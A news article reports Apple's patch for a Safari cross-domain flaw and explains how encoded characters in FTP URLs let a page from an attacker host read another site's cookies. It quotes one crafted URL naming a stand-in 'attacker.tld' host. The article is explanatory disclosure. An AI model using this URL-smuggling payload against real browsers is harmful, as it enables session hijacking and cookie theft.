Apple Patches Safari Cookie Vulnerability

A security researcher in Finland has revealed the details of a potentially nasty flaw with Apple’s Safari web browser.

It comes after Apple patched the flaw with its Safari 8.0.5 update last week.

Flawed

“The 4/8/2015 security updates from Apple included a patch for a Safari cross-domain vulnerability,” blogged Jouko Pynnönen, from Finnish security firm Klikki Oy.

An attacker could create web content which, when viewed by a target user, bypasses some of the normal cross-domain restrictions to access or modify HTTP cookies belonging to any website,”  Pynnönen wrote.

“Most websites which allow user logins store their authentication information (usually session keys) in cookies. Access to these cookies would allow hijacking authenticated sessions. Cookies can also contain other sensitive information,” he warned.

It seems the problem affected all versions of the Safari web browser, on iOS, OS X, and Windows machines. This includes Safari 7.0.4 on OS X 10.9.3; Safari on iPhone 3GS, iOS 6.1.6; Safari on iOS 8.1 simulator; and Safari 5.1.7 on Windows 8.1.

“The number of affected devices may be of the order of 1 billion,” he warned.

So how does the vulnerability work? Well, Pynnönen pointed out that Safari supports the FTP URL scheme that allows HTML documents to be accessed via URLs beginning with “ftp://”. These URLs can be of the form ftp://user:password@host/path. The problem arises when encoded special characters are used in the user or password parts.

For example, consider the following URL:
ftp://user%40ftp.attacker.tld%2Fexploit.html%23@apple.com/

If correctly interpreted, the URL refers to a document on apple.com. However, when loaded by a vulnerable browser, the network layer uses an extraneously decoded version of the URL:

ftp://user@ftp.attacker.tld/exploit.html#apple.com/

The document would be loaded from ftp.attacker.tld, not apple.com. Yet the document properties such as document.domain and document.cookie are correctly initialised using apple.com.

The attacker-supplied document, exploit.html, can therefore access and modify cookies belonging to apple.com via JavaScript.

Worried Safari users can check if their browser has the vulnerability by using the following vulnerability checker here.

Security Record

Apple generally has a good reputation, although there have been a number of problems to do with the Safari web browser over the years.

This time last year for example, Apple had to patch 27 bugs in Safari that could have allowed hackers to target Safari users via specially-crafted sites

And last August, Apple had to issue a security update for Safari that fixed a WebKit vulnerability that could have allowed the execution of arbitrary code if a user visited a malicious website.

Other problems with Safari have also been exposed in the past which has resulted in Apple issuing patches.

Are you a security expert? Try our quiz!